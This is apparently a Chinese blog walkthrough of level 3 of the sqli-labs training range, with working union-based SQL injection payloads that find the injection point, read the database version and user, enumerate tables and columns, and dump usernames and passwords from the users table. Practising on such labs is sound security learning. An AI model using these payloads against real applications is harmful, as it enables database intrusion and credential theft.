SQL注入sqli_labs靶场第三题

?id=1'and 1=1 and '1'='1和?id=1'and 1=1 and '1'='1进行测试如果1=1页面显示正常和原页面一样,并且1=2页面报错或者页面部分数据显示不正常,那么可以确定此处为字符型注入。

根据报错信息判断为单引号带括号注入

联合查询:

猜解列名

?id=1') order by 3--+

判断回显点

?id=-1') union select 1,2,3--+

爆库、版本号、权限

?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,user()--+

爆表、爆列

?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'

爆账号密码

?id=-1') union select 1,2,(select group_concat(username,password))from users

相关推荐
白云偷星子3 小时前
MySQL笔记14
数据库·笔记·mysql
绵绵细雨中的乡音4 小时前
MySQL 常用函数实操指南:从基础到实战案例
数据库·mysql
wudl55665 小时前
Flink SQL 与 Kafka 整合详细教程
sql·flink·kafka
凉栀お_5 小时前
MySQL相关知识查询表中内容(第二次作业)
数据库·mysql
Java水解5 小时前
【SQL】MySQL中空值处理COALESCE函数
后端·mysql
shuair7 小时前
mysql8支持远程访问 -mysql5.7支持远程访问
linux·mysql
白云偷星子7 小时前
MySQL笔记13
数据库·笔记·mysql
FJW0208148 小时前
关系型数据库大王Mysql——DDL语句操作示例
数据库·mysql
wudl55668 小时前
flink sql 所有函数详细用例
大数据·sql·flink
-Xie-9 小时前
Mysql杂志(三十三)——锁
数据库·mysql